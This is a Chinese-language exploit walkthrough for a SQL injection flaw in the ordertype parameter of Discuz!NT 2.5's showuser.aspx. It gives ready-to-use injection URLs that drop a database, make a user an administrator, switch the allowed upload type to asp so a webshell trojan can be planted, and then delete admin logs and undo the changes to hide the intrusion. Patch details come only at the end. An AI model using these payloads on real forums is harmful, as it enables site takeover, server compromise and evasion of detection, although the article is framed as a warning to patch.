Discuz!NT是一款功能強(qiáng)大的基于ASP.net平臺的BBS系統(tǒng)，占有不少的市場份額，特別是一些大中型專業(yè)社區(qū)都采用該系統(tǒng)。最近，ISTO成員在其最新的2.5版本中發(fā)現(xiàn)了一個安全漏洞，成功利用此漏洞可以直接修改管理員的密碼進(jìn)入后臺，取得管理員權(quán)限，從而控制整個網(wǎng)站。下面筆者部署環(huán)境解析該漏洞，以期引起大家的重視。
　　環(huán)境描述
　　操作系統(tǒng)：Windows 2003
　　Discuz!NT版本：2.5
　　URL：http://www.gslw.com
　　數(shù)據(jù)庫：SQL Server 2005
　　1、漏洞起因
　　漏洞是由showuser.aspx文件引起的，該文件的作用是顯示論壇的會員列表。由于腳本中對于用來用戶排序的ordertype參數(shù)未經(jīng)過濾而直接查詢數(shù)據(jù)庫，攻擊者可以通過精心構(gòu)造的ordertype參數(shù)進(jìn)行數(shù)據(jù)庫的寫操作。(圖1)

　　2、漏洞測試
　　判斷Discuz!NT是否存在該漏洞，我們可以構(gòu)造ordertype參數(shù)進(jìn)程測試。下面代碼的意思是刪除gslw數(shù)據(jù)庫，由于不存在gslw數(shù)據(jù)庫因此會報錯“無法對數(shù)據(jù)庫'glsw'執(zhí)行刪除，因為它不存在，或者您沒有所需的權(quán)限?！边@就說明執(zhí)行了數(shù)據(jù)庫操作，我們可以根據(jù)錯誤信息判斷是否存在該漏洞。我們構(gòu)造的URl為
　　http://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;--
　　顯示的錯誤頁面見圖1，說明存在該漏洞。(圖2)

3、用戶提權(quán)
　　打開論壇注冊一個用戶為hacker的會員見圖3，然后我們可以進(jìn)行構(gòu)造一段URL通過showuser.aspx的ordertype參數(shù)將hacker提升為管理員。構(gòu)造的URL為“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';--”其作用就是將注冊用戶hacker的adminid和guoupid設(shè)置為1，也就是將其提升為管理員。將該URL輸入瀏覽器地址欄回車后可以看到hacker被提升為管理員見圖4。(圖3)(圖4)


　　hacker被提升為管理員后就可以登錄系統(tǒng)后臺進(jìn)行各種操作了。Discuz!NT的后臺功能確實比較強(qiáng)大，(圖5)

　　4、更改上傳格式
　　該漏洞除了可以提升管理員為，還可以更改默認(rèn)的附件上傳格式。默認(rèn)情況下，Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上傳，利用該漏洞可以將其中的某種格式替換為asp、aspx等可執(zhí)行腳本的格式，從而獲得一個Webshell。我們可以構(gòu)造URL更改其上傳文件格式，比如我們將jgp格式更改為aspx格式，就可以構(gòu)造這樣的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';--” ，最終的執(zhí)行效果見圖6。(圖6)

5、獲得Webshell
　　通過上面的操作我們就可以在任意一論壇版塊下發(fā)表新主題 ，然后通過附件上傳功能將以asp木馬上傳到服務(wù)器。上傳完成后，在“我的附件”項下可以找到上傳的asp木馬，點擊該asp網(wǎng)馬就直接運(yùn)行，登錄后獲得一個webshell。(圖7)

　　6、清除痕跡
　　獲得webshell后，就可以通過該漏洞構(gòu)造URL清除痕跡，恢復(fù)Discuz!NT的默認(rèn)狀態(tài)。主要包括一下幾項：
　　http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';-- 改回jpg格式
　　http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';-- 清除日志
　　http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';-- hacker降權(quán)限
　　7、總結(jié)及防范
　　從上面的演示可以看到該漏洞對采用Discuz!NT的BBS威脅極大，攻擊者不僅能夠進(jìn)入后臺，而且可以獲取webshell，進(jìn)而滲透控制服務(wù)器。筆者上面演示用的是asp木馬，如果用aspx木馬其權(quán)限將更大，拿下服務(wù)器將會更容易。
　　針對此漏洞Discuz!NT官方提供了補(bǔ)丁，該補(bǔ)丁的地址為：
　　http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
　　修正方法是將壓縮包中的Discuz.Web.dll文件上傳到bin目錄，覆蓋掉以前的文件。雖然Discuz!NT比較迅速地發(fā)布了補(bǔ)丁，但是筆者在此刻進(jìn)行了安全測試，有相當(dāng)多的采用Discuz!NT 2.5系統(tǒng)的BBS論壇依舊沒有打該補(bǔ)丁。希望通過此文，能夠引起大家對該漏洞的重視，盡快修復(fù)漏洞。

最新評論